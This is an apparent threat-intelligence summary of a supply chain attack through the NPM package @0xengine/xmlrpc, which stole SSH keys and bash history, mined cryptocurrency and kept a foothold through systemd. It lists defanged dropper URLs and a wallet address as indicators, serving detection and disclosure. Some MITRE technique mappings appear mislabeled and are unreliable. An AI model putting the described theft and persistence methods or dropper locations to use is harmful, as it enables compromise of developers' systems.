Summary:
The Checkmarx Research team has uncovered a year-long supply chain attack involving the malicious NPM package @0xengine/xmlrpc, which evolved from a legitimate XML-RPC implementation to a tool for stealing sensitive data and mining cryptocurrency. This incident highlights the need for ongoing vigilance in monitoring software supply chains, as even seemingly safe packages can become compromised.
#SupplyChainSecurity #MaliciousPackages #OpenSourceRisks
The Checkmarx Research team has uncovered a year-long supply chain attack involving the malicious NPM package @0xengine/xmlrpc, which evolved from a legitimate XML-RPC implementation to a tool for stealing sensitive data and mining cryptocurrency. This incident highlights the need for ongoing vigilance in monitoring software supply chains, as even seemingly safe packages can become compromised.
#SupplyChainSecurity #MaliciousPackages #OpenSourceRisks
Keypoints:
- A malicious NPM package, @0xengine/xmlrpc, has been active from October 2023 to November 2024, receiving 16 updates.
- The package transitioned from a legitimate XML-RPC implementation to a malicious tool by introducing obfuscated code in later versions.
- It steals sensitive data and mines cryptocurrency every 12 hours, exfiltrating data through Dropbox and file.io.
- Distribution occurred via direct NPM installation and as a dependency in a legitimate GitHub repository.
- The malware employs evasion techniques to avoid detection and has been found on up to 68 compromised systems.
MITRE Techniques
- Data Encrypted for Impact (T1486): The malware encrypts sensitive data to exfiltrate it without detection.
- Command and Control (T1071): Utilizes Dropbox and file.io for data exfiltration.
- Credential Dumping (T1003): Gathers SSH keys and bash history for sensitive information.
- Cryptojacking (T1496): Mines cryptocurrency using compromised systems.
- Persistence (T1547): Establishes a systemd service to maintain presence on infected systems.
- Exploitation of Software Dependencies (T1190): The package exploits trust in dependencies to spread.
IoC:
- [url] hxxps[:]//codeberg[.]org/k0rn66/xmrdropper/raw/branch/master/xprintidle
- [url] hxxps[:]//codeberg[.]org/k0rn66/xmrdropper/raw/branch/master/xmrig
- [url] hxxps[:]//codeberg[.]org/k0rn66/xmrdropper/raw/branch/master/Xsession.sh
- [wallet address] 45J3v3ooxT335ENFjJBB3s7WS7xGekEKiBW4Z6sRSTUa5Kbn8fbqwgC47SLUDdKsri7haj7PBi5Wvf3xLmrX9CEZ3MGEVJU
Full Research: https://checkmarx.com/blog/npm-supply-chain-attack-combines-crypto-mining-and-data-theft/